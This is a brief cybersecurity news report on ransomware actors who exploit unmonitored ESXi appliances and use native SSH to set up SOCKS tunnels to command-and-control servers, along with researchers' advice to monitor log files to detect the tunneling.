Cybersecurity researchers have identified a worrying trend in ransomware attacks targeting ESXi systems. These attacks not only compromise the systems but also use them to create covert communication channels with command-and-control infrastructure. By exploiting unmonitored ESXi appliances, threat actors employ techniques that blend into legitimate traffic, making detection challenging. Researchers emphasize the importance of monitoring specific log files to detect suspicious tunneling activity and highlight vulnerabilities in accessing these critical logs for effective forensic investigations.
ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely, Sygnia researchers noted.
Threat actors use these platforms by adopting 'living-off-the-land' techniques and using native tools like SSH to establish a SOCKS tunnel between their C2 servers.
Collection
[
|
...
]